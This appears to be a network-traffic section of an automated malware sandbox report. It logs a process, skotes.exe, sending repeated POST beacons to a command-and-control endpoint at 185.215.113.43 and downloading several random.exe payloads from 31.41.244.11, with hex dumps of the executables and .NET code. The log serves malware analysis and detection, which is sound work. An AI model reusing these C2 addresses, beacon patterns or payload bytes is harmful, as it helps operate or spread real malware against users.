                                                                                                                                                                                                                                        Data Ascii: -o3+*IM0erp( (+~%-&~s*%(+(+~%-&~ s4%(++*0urprpo#+=o6(+,X+
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500096083 CET1236INData Raw: 0b 07 06 fe 06 29 00 00 06 73 4f 00 00 0a 28 0c 00 00 2b 28 07 00 00 2b 0c 2b 00 08 2a 13 30 02 00 1c 00 00 00 10 00 00 11 00 28 51 00 00 0a 73 52 00 00 0a 0a 06 20 20 02 00 00 6f 53 00 00 0a 0b 2b 00 07 2a 1b 30 03 00 44 00 00 00 11 00 00 11 00
                                                                                                                                                                                                                                        Data Ascii: )sO(+(++*0(QsR oS+*0D(ToUsV%rpoW(X&rpoY((*(0Ls*s}{oZr1p(++s\(+(+
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500107050 CET1236INData Raw: 70 02 7b 19 00 00 04 8c 3f 00 00 01 28 73 00 00 0a 28 19 00 00 0a 00 02 02 7b 16 00 00 04 28 08 00 00 06 7d 1a 00 00 04 02 7b 1a 00 00 04 2d 07 72 cd 04 00 70 2b 05 72 09 05 00 70 28 19 00 00 0a 00 02 72 3f 05 00 70 7d 1b 00 00 04 7e 04 00 00 04
                                                                                                                                                                                                                                        Data Ascii: p{?(s({(}{-rp+rp(r?p}~(rp((u~(rp((u{~(}%{(voo(w-C%}}/|(+}{/|/
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500118017 CET1236INData Raw: 14 7d 1d 00 00 04 02 14 7d 20 00 00 04 02 14 7d 21 00 00 04 02 14 7d 22 00 00 04 02 14 7d 24 00 00 04 02 14 7d 25 00 00 04 02 14 7d 26 00 00 04 02 7c 15 00 00 04 09 28 82 00 00 0a 00 de 53 02 1f fe 7d 14 00 00 04 02 14 7d 1b 00 00 04 02 14 7d 1c
                                                                                                                                                                                                                                        Data Ascii: }} }!}"}$}%}&|(S}}}}} }!}"}$}%}&|(*A|[Wb7d77#
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500128984 CET1236INData Raw: 40 00 00 04 28 04 00 00 06 6f 6f 00 00 0a 13 04 12 04 28 77 00 00 0a 2d 43 02 16 25 0a 7d 3b 00 00 04 02 11 04 7d 42 00 00 04 02 13 05 02 7c 3c 00 00 04 12 04 12 05 28 13 00 00 2b 00 de 70 02 7b 42 00 00 04 13 04 02 7c 42 00 00 04 fe 15 21 00 00
                                                                                                                                                                                                                                        Data Ascii: @(oo(w-C%};}B|<(+p{B|B!%};(p&};}?}@|<("};}?}@|<(*A4r$)&*BSJB
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500242949 CET1120INData Raw: 04 01 00 75 04 f4 04 01 00 a4 04 fb 04 01 00 c5 04 04 05 01 00 f7 04 0d 05 01 00 31 00 33 03 01 00 d4 01 0d 05 01 00 f7 02 33 03 01 00 b9 03 0d 05 01 00 0a 04 33 03 01 00 7b 02 14 05 06 00 fb 07 aa 04 06 00 8c 0c db 04 06 00 c3 0a 33 03 06 00 85
                                                                                                                                                                                                                                        Data Ascii: u1333{33P!,"l'{+HA0433?'{ 7P = D SI4!|
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.503798008 CET1236INData Raw: 00 01 00 9c 07 07 00 99 00 08 00 99 00 09 00 99 00 09 00 5a 0d 01 00 11 00 5a 0d 06 00 19 00 5a 0d 0a 00 29 00 5a 0d 10 00 31 00 5a 0d 10 00 39 00 5a 0d 10 00 41 00 5a 0d 10 00 49 00 5a 0d 10 00 51 00 5a 0d 10 00 59 00 5a 0d 10 00 61 00 5a 0d 15
                                                                                                                                                                                                                                        Data Ascii: ZZZ)Z1Z9ZAZIZQZYZaZiZqZyZZZZ Z11&QZ929d89|EqgOyTZZsy,xZyyZ
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.503914118 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 ad 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 88 04 17 06 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 88 04 ec 0a 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 88 04 be 07 00 00 00 00 04 00 02 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: </@/dIKSW2YJkJoJJW./b'L<textoKebabCase>5__10<AnalizarTextoAsync
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.619782925 CET1236INData Raw: 70 61 6c 61 62 72 61 3e 35 5f 5f 32 34 00 3c 65 73 50 61 6c 69 6e 64 72 6f 6d 6f 3e 35 5f 5f 34 00 3c 66 6c 75 6a 6f 41 72 63 68 69 76 6f 3e 35 5f 5f 34 00 3c 65 78 3e 35 5f 5f 34 00 3c 61 6e 61 67 72 61 6d 61 73 3e 35 5f 5f 31 35 00 3c 75 72 6c
                                                                                                                                                                                                                                        Data Ascii: palabra>5__24<esPalindromo>5__4<flujoArchivo>5__4<ex>5__4<anagramas>5__15<urlDescarga1>5__5<ex>5__5<palabrasConErrores>5__16<tareaDescarga1>5__6<>s__17<frecuenciaPalabras>5__7<par>5__18<longitudMaximaPalabra>5__8<Main>d__8<>s__19


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        7192.168.2.449832185.215.113.43807832C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:38.049490929 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 31 37 33 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: d1=1017351001&unit=246122658369
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:39.398313999 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:09:39 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        8192.168.2.44983831.41.244.11807832C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:39.825700998 CET62OUTGET /files/unique3/random.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.147845030 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:09:40 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 1978368
                                                                                                                                                                                                                                        Last-Modified: Thu, 19 Dec 2024 05:03:50 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        ETag: "6763a936-1e3000"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 5e 03 00 00 00 01 00 00 70 4b 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$z)))()()()()()()()))))9()9))9()Rich)PEL_{_d%|^pK@K~@Vjl <@.rsrclL@.idata T@ )V@alcvhdaz1X@vjrkdbwz`K@.taggant0pK"@
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.147888899 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.147927046 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.147965908 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148000002 CET896INData Raw: b4 be 1b 94 d6 64 02 33 31 53 0d bc 52 d8 7f 8d df ee 35 3a 4e 8d 3e 0f 72 84 ac fe 57 d6 a8 6c 8e b7 9f 8e 6e 3a 27 92 94 f0 8b fd e0 bc 6a c0 02 b8 99 2b ac 2f bd 89 f1 dc 0c aa 2f e2 87 19 fd 01 af 2a 87 90 7b 2d 6a e9 6f 88 c6 92 49 4e d2 77
                                                                                                                                                                                                                                        Data Ascii: d31SR5:N>rWln:'j+//*{-joINwwlm<&%~o8_~FS;+~FdVfAl7m@p,t+.gU[ZO]>9 3Nu~fVZ?\oP
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148036003 CET1236INData Raw: b1 46 cc 6f 7b ee bc df be 9b b2 0f 7d 65 8a 66 5b db 77 30 90 0d ab d5 2f 92 82 9e 90 1d 5c 84 d1 f1 dc d2 d5 94 b4 2c a5 6c 1e 2e b2 41 00 68 4f e5 e4 e8 0e 44 f6 01 98 18 58 9c c3 be 6c 5e b6 54 d4 2b 79 9a 17 d4 fd 3e 6c 0a ca f8 97 95 d6 df
                                                                                                                                                                                                                                        Data Ascii: Fo{}ef[w0/\,l.AhODXl^T+y>ljl3.h_f,NINiOYYzP0gnaH@\gr7%5|]<F^(UF3|"ZbagTf9bl3m"ekM*|ls):]_
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148066044 CET224INData Raw: 7f 59 5c 74 14 f1 b8 87 d3 a6 d2 69 7d 0c 06 b8 af d6 3f fb df 31 ac f1 4f a8 92 bf 02 84 9a 1e f6 d7 b7 e1 36 13 5d be a6 10 bd ef 3e 96 0d 0a 6a 9a d7 67 8e 75 ab 85 7e 92 d0 ad 10 d2 5f c1 7f f1 55 4e ac 02 44 02 45 6c 11 d2 1a c3 03 68 28 07
                                                                                                                                                                                                                                        Data Ascii: Y\ti}?1O6]>jgu~_UNDElh(@hw=YcDB~plZhlc%_jDJ@~#:+5vD^k'V6>;n!^Y\0zJF)C?laF
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148159027 CET1236INData Raw: 98 cc 8e 3c 7e d6 b5 6c 31 72 2b 75 6e 47 95 08 93 36 be 23 17 cf bc 99 fc b5 70 a2 c5 83 a9 ae e1 13 db de 44 59 b5 44 95 49 46 e0 d2 b3 65 40 43 cc 00 ee fa d6 20 6c e6 1e 7b 2d 6d a7 3c a9 94 a4 88 25 00 9c 32 c0 24 01 2b 2a f0 90 98 c5 0e 37
                                                                                                                                                                                                                                        Data Ascii: <~l1r+unG6#pDYDIFe@C l{-m<%2$+*7lIr1oP\6r(F6')TO[e|ee2@S,j`?6AAgqBYe+Ip7p5)$(AlK)ht
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148194075 CET1236INData Raw: 75 03 11 cf 00 84 70 11 6c ca b3 e1 b5 8c 52 d6 a6 ec bc 7f eb 3f 0d 5f 34 28 3a 19 0e 06 a2 f0 ec c4 1f 52 94 07 b0 f8 42 03 fa ef 68 8f 0d 98 68 46 42 db fb 42 88 b9 a4 e4 88 c0 76 72 47 2a 0d 90 e4 bb ca 75 6c bf 0c 9f 49 d4 d2 0e d6 45 5a cc
                                                                                                                                                                                                                                        Data Ascii: uplR?_4(:RBhhFBBvrG*ulIEZd#KP5<l_RwoeX$;w!0r!Ygt'&E0.l1i0FJm/M?\d %omIo#v_75JWI%
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148226976 CET448INData Raw: e6 16 00 68 80 d3 5b f0 0e b5 c9 80 1b 18 84 ca a5 67 7b a0 79 b5 d3 9a 5a 94 2e 00 0e 28 cc a4 56 aa bf 94 d6 45 bb a6 fc 6c 92 3f c4 bf 00 1c f2 52 12 02 0e ce 96 07 a8 84 5c 64 ee 7e e6 69 f8 8b 67 3e 0d 19 85 08 54 18 84 b5 b7 ba 1d ab e0 ae
                                                                                                                                                                                                                                        Data Ascii: h[g{yZ.(VEl?R\d~ig>TV/nZN8-/E`Rga;V!T QEXn*!o[3I?5;<dkFy.qV&ln^nv/7a-Nit.`FH4.l~mh-G{K
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.267731905 CET1236INData Raw: 48 dd a2 c0 87 7a 13 2a ba 88 9d 3d 5e 80 0c fc a9 64 2a 18 55 83 ec 5a b3 13 cf 7c 46 18 b4 2e b6 41 37 3e 4f 07 a5 68 54 fc fa d0 b1 7e d5 6f 41 8a e1 3d bd ff 4a 0f 2a a4 8a be 77 46 15 30 c4 17 ab 8a d4 92 5b 45 e1 97 5f 62 17 f1 63 ca d3 60
                                                                                                                                                                                                                                        Data Ascii: Hz*=^d*UZ|F.A7>OhT~oA=J*wF0[E_bc`;#mn<]b#*xoTIL\BlRRrS6y?hs1rZE$-fPmMV[n]/;p|cK4Y.`I#lkh{+41


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        9192.168.2.449854185.215.113.43807832C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:47.080477953 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 31 37 33 35 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: d1=1017352001&unit=246122658369
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:48.309860945 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:09:48 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        10192.168.2.44986031.41.244.11807832C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:48.447982073 CET62OUTGET /files/burpin1/random.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.769938946 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:09:49 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 4438776
                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        ETag: "675784f0-43baf8"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.769979954 CET1236INData Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1
                                                                                                                                                                                                                                        Data Ascii: jZQ39FY~9F~fAfG@;F|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A|At>E;Ew6rE;Es,j*P*YYtlAj@ AEPjh5XAA3D$tlA
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770070076 CET448INData Raw: 3b f3 74 06 8b 06 56 ff 50 08 33 c0 40 eb 25 e8 a7 fe ff ff 8d 4d e0 8b f8 e8 bb 0e 01 00 8b 06 56 ff 50 08 8b c7 eb 0c 3b f3 74 06 8b 06 56 ff 50 08 33 c0 5e 5f 5b c9 c3 56 8b f1 c7 46 04 60 c3 41 00 83 66 08 00 c7 06 34 a5 41 00 c7 46 04 24 a5
                                                                                                                                                                                                                                        Data Ascii: ;tVP3@%MVP;tVP3^_[VF`Af4AF$AfNf$N(^Uh$AuYYtEP#UPQ3hAudYYu@]Vv({F$YtPQvzvYtVP^l$
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770119905 CET1236INData Raw: 56 8b f1 8d 4e 08 c7 06 58 a5 41 00 e8 fa 0a 01 00 f6 44 24 08 01 74 07 56 e8 f1 79 01 00 59 8b c6 5e c2 04 00 55 8b ec 51 56 57 ff 75 08 8b f1 8d 4e 0c e8 26 1e 01 00 ff 75 0c 8d 7e 10 8b cf e8 63 fb ff ff 6a 5c 8b cf e8 ec fe ff ff 33 ff 8d 45
                                                                                                                                                                                                                                        Data Ascii: VNXAD$tVyY^UQVWuN&u~cj\3EPWVh<@WW5dA=lAA=AhAtsj5hAAlA;=XAt2t!ttg~k~}PjKjjjW|YYd9=`Au\EP5hAAMt;u
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770157099 CET1236INData Raw: 48 08 89 78 10 89 78 14 e8 2c 07 01 00 84 c0 0f 85 b0 00 00 00 ff 15 98 a1 41 00 53 8d 4d e4 89 45 08 e8 7b f6 ff ff 8d 45 e4 50 e8 5e 16 00 00 3b c7 59 7d 3b ff 75 08 8b 06 6a 6a 56 ff 50 20 ff 75 e4 8b f0 e8 f1 74 01 00 8b 45 0c 3b c7 59 74 06
                                                                                                                                                                                                                                        Data Ascii: Hxx,ASME{EP^;Y};ujjVP utE;YtPQMutYMf<AuE6YujhVPF jSHxxuAPjjVS uwtYuMVEM0g#E8>AP
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770190954 CET1236INData Raw: 6a 18 ff 75 08 ff 15 40 a0 41 00 57 53 ff 75 d8 ff d6 57 53 ff 75 dc 89 45 f4 ff d6 ff 75 fc 8b 35 18 a0 41 00 89 45 f8 ff d6 ff 75 fc 8b d8 ff d6 ff 75 08 8b 35 38 a0 41 00 53 8b f8 ff d6 ff 75 f8 89 45 f0 ff 75 f4 ff 75 fc ff 15 34 a0 41 00 50
                                                                                                                                                                                                                                        Data Ascii: ju@AWSuWSuEu5AEuu58ASuEuu4APWjWE<Ah u3uPPSuuPPW,AjW(AuESuW5$ASWujAEuWAWWWWuTA_^[UhSVWj@EPuA-h
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770226955 CET1236INData Raw: 83 25 84 e9 41 00 00 c3 83 25 84 e9 41 00 00 68 60 a6 41 00 68 c4 a5 41 00 ff 15 68 a1 41 00 50 ff 15 6c a1 41 00 85 c0 74 11 68 88 e9 41 00 ff d0 c7 05 84 e9 41 00 01 00 00 00 c3 56 8b 74 24 08 85 f6 75 05 33 c0 40 5e c3 e8 3f ff ff ff 83 f8 09
                                                                                                                                                                                                                                        Data Ascii: %A%Ah`AhAhAPlAthAAVt$u3@^?uuu@;t3^US3EPSSSSSSh j jEP]]]]]]]EAtEPuSAuAE[UEVpEtKQ;SW}=3~'4<
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770306110 CET896INData Raw: 5e c2 04 00 53 56 8b f1 8b 06 33 db 57 8b 7c 24 10 89 5e 04 88 18 38 1f 74 07 43 80 3c 3b 00 75 f9 53 e8 33 fc ff ff 8b 06 8a 0f 88 08 40 47 84 c9 75 f6 5f 89 5e 04 8b c6 5e 5b c2 04 00 56 57 8b 7c 24 0c 8b f1 3b fe 74 25 83 66 04 00 8b 06 c6 00
                                                                                                                                                                                                                                        Data Ascii: ^SV3W|$^8tC<;uS3@Gu_^^[VW|$;t%fw@AuGF_^Vj&NT$FF^SVW|$38tC<;uSF@Gu^_^[VW|$wF@A
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770343065 CET1236INData Raw: 89 5d f0 eb 03 8b 7d 08 8b 07 8d 4d e4 51 b9 00 10 00 00 2b ce 51 8d 8c 35 e0 ef ff ff 51 57 ff 50 0c 85 c0 0f 85 ca 00 00 00 8b 45 e4 3b c3 0f 84 bf 00 00 00 03 f0 8d 85 e0 ef ff ff 33 ff 89 45 f8 38 5d ff 8b c6 74 3d 2b 45 e8 3b f8 77 60 ff 75
                                                                                                                                                                                                                                        Data Ascii: ]}MQ+Q5QWPE;3E8]t=+E;w`uuubE:EtuMvGE+E;w#uuubuEEE+}V=]PP<A9]w}"M39Y
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770415068 CET224INData Raw: 01 50 50 8b cf e8 97 f6 ff ff 50 ff 74 24 18 ff 15 c4 a2 41 00 8b 07 66 83 24 70 00 89 77 04 8b c7 5f 5e c3 55 8b ec 83 ec 74 53 56 8b 75 08 57 6a 40 8d 45 8c 50 56 ff 15 9c a2 41 00 85 c0 74 49 68 f8 a5 41 00 8d 45 8c 50 ff 15 48 a1 41 00 85 c0
                                                                                                                                                                                                                                        Data Ascii: PPPt$Af$pw_^UtSVuWj@EPVAtIhAEPHAu6jV|Au)EVPvjhAutu]Y3_^[VA3;EthAhAEPVYYVAhAE+ESSWuPE+EP
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.890024900 CET1236INData Raw: ff 75 d0 ff 75 cc 68 04 08 00 50 68 84 a5 41 00 68 94 a6 41 00 53 ff 15 a0 a2 41 00 8b f8 3b fb 0f 84 7b ff ff ff 56 ff 15 b4 a2 41 00 8b 35 b8 a2 41 00 53 6a 22 68 59 04 00 00 57 ff d6 6a 0f ff 15 cc a2 41 00 50 53 68 43 04 00 00 57 ff d6 b8 e9
                                                                                                                                                                                                                                        Data Ascii: uuhPhAhASA;{VA5ASj"hYWjAPShCWPEEPEP]uEPhaWu]u]YYUQSVW=(AjEPuuTCPECSuPu>Wf$GYF_^[Vj


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        11192.168.2.449888185.215.113.43807832C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.159229040 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 31 37 33 35 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: d1=1017353001&unit=246122658369
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.503082037 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:10:00 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        12192.168.2.44989231.41.244.11807832C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:00.628504038 CET59OUTGET /files/dodo/random.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955661058 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:10:01 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 765568
                                                                                                                                                                                                                                        Last-Modified: Tue, 17 Dec 2024 09:46:16 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
